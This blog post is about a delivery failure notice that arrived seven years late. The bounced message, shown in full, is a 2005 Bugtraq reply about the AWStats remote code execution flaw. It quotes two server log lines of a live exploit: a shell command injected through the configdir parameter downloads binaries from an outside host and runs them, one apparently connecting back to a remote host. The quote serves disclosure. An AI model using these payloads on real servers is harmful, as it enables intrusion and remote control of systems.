home Get a blog for free contact login

Delivery failure notice for a 7 year old message

Posted: Mon, 26 Mar 2012 16:26:01 +0300 (Updated: Thu, 09 Jan 2020 19:33:27 +0200)
Author: Делян Кръстев

Yesterday I have received a delivery failure notice for a message which I have sent over 7 years ago!

Here is the message in its entirety:


Return-Path: <>
Delivered-To: krustev.net-krustev@krustev.net
Received: (qmail 18822 invoked from network); 24 Mar 2012 23:40:23 -0000
Received: from osaka.tehbass.nl (HELO osaka.tehbass.nl) (141.105.120.64)
    by home.krustev.net (qpsmtpd/0.84) with ESMTP; Sun, 25 Mar 2012 01:40:23 +0200
X-Bad-Reverse-DNS: no (dnsname - 'osaka.tehbass.nl', dnsip - '141.105.120.64')
Received: by osaka.tehbass.nl (Postfix)
    id 27D574C6C9; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)
From: MAILER-DAEMON@osaka.tehbass.nl (Mail Delivery System)
Subject: Undelivered Mail Returned to Sender
To: krustev@krustev.net
Auto-Submitted: auto-replied
MIME-Version: 1.0
Content-Type: multipart/report;
  report-type=delivery-status;
  boundary="1A3704C621.1332632452/osaka.tehbass.nl"
Content-Transfer-Encoding: 8bit
Message-Id: <20120324234052.27D574C6C9@osaka.tehbass.nl>
X-Length: 6718
X-UID: 5914

This is a MIME-encapsulated message.

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Notification
Content-Type: text/plain; charset=us-ascii

This is the mail system at host osaka.tehbass.nl.

I'm sorry to have to inform you that your message could not
be delivered to one or more recipients. It's attached below.

For further assistance, please send mail to postmaster.

If you do so, please include this problem report. You can
delete your own text from the attached returned message.

                   The mail system

<sjm@localhost.tehbass.nl> (expanded from <sjm@localhost>): cannot update
    mailbox /var/spool/mail/sjm for user sjm. error writing message: File too
    large

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Delivery report
Content-Type: message/delivery-status

Reporting-MTA: dns; osaka.tehbass.nl
X-Postfix-Queue-ID: 1A3704C621
X-Postfix-Sender: rfc822; krustev@krustev.net
Arrival-Date: Sun, 25 Mar 2012 00:40:52 +0100 (CET)

Final-Recipient: rfc822; sjm@localhost.tehbass.nl
Original-Recipient: rfc822;sjm@localhost
Action: failed
Status: 5.2.2
Diagnostic-Code: x-unix; input/output error

--1A3704C621.1332632452/osaka.tehbass.nl
Content-Description: Undelivered Message
Content-Type: message/rfc822
Content-Transfer-Encoding: 8bit

Return-Path: <krustev@krustev.net>
Received: from osaka.tehbass.nl (localhost [127.0.0.1])
    by osaka.tehbass.nl (Postfix) with ESMTP id 1A3704C621
    for <sjm@localhost>; Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Delivered-To: sjtmulder1981@gmail.com
Received: from gmail-pop.l.google.com [74.125.79.108]
    by osaka.tehbass.nl with POP3 (fetchmail-6.3.21)
    for <sjm@localhost> (single-drop); Sun, 25 Mar 2012 00:40:52 +0100 (CET)
Received: by 10.216.80.104 with SMTP id j82cs110797wee;
        Mon, 3 May 2010 01:21:44 -0700 (PDT)
Received: by 10.216.173.69 with SMTP id u47mr5747536wel.227.1272874451923;
        Mon, 03 May 2010 01:14:11 -0700 (PDT)
Received-SPF: neutral (google.com: 213.19.161.176 is neither permitted nor denied by best guess record for domain of pop.vevida.com) client-ip=213.19.161.176;
Received: by 10.241.241.82 with POP3 id 18mf39140wwb.56;
        Mon, 03 May 2010 01:14:11 -0700 (PDT)
X-Gmail-Fetch-Info: groen@nl-crew.com 1 pop.gmail.com 995 groen@nl-crew.com
Received: from localhost (localhost.localdomain [127.0.0.1])
    by lisa2xl.intranet.mens.nl.nu (8.12.11/8.12.11) with ESMTP id j0RLUcXT009387
    for <bas@localhost>; Thu, 27 Jan 2005 21:31:14 GMT
Delivered-To: postmaster@aspprojects.nl
Received: from pop.vevida.com [213.19.161.176]
    by localhost with POP3 (fetchmail-6.2.5)
    for bas@localhost (single-drop); Thu, 27 Jan 2005 21:31:14 +0000 (GMT)
Received: (qmail 32077 invoked by uid 89); 27 Jan 2005 00:46:25 -0000
Delivered-To: aspprojects.nl-sjt@aspprojects.nl
Received: (qmail 32072 invoked by uid 0); 27 Jan 2005 00:46:25 -0000
Received: from frost.nl-crew.com (84.244.131.214)
  by net3-nl-mail-04.ad.vevida.net with SMTP; 27 Jan 2005 00:46:25 -0000
Received: from [205.206.231.27] (outgoing.securityfocus.com [205.206.231.27])
    by frost.nl-crew.com (Postfix) with ESMTP id 5AB8468492
    for <bugtrack@mrgreen.eu.org>; Thu, 27 Jan 2005 01:45:28 +0000 (GMT)
Received: from no.name.available by [205.206.231.27]
          via smtpd (for [84.244.131.214] [84.244.131.214]) with ESMTP; Wed, 26 Jan 2005 16:46:24 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
    by outgoing3.securityfocus.com (Postfix) with QMQP
    id 27D2323728F; Wed, 26 Jan 2005 16:14:40 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3685 invoked from network); 26 Jan 2005 12:59:54 -0000
Content-Type: text/plain;
  charset="iso-8859-1"
From: Delian Krustev <krustev@krustev.net>
To: bugtraq@securityfocus.com,
 full-disclosure@lists.netsys.com,
 security-alerts@linuxsecurity.com
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
Date: Wed, 26 Jan 2005 20:31:51 +0200
User-Agent: KMail/1.4.3
References: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
In-Reply-To: <20050125201313.GA8733@tomservo.ne1.client2.attbi.c>
MIME-Version: 1.0
Message-Id: <200501262031.51944.krustev@krustev.net>
X-Spam-Status: No, hits=0.0 required=5.0, tests=none, version=3.0.2
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by lisa2xl.intranet.mens.nl.nu id j0RLUcXT009387
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 3728

There's an exploit in the wild. Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.



--1A3704C621.1332632452/osaka.tehbass.nl--
Posted in dir: /blog/
Tags: email
Show comments Report article PermaLink
All tags SiteMap Owner Cookies policy [Atom Feed]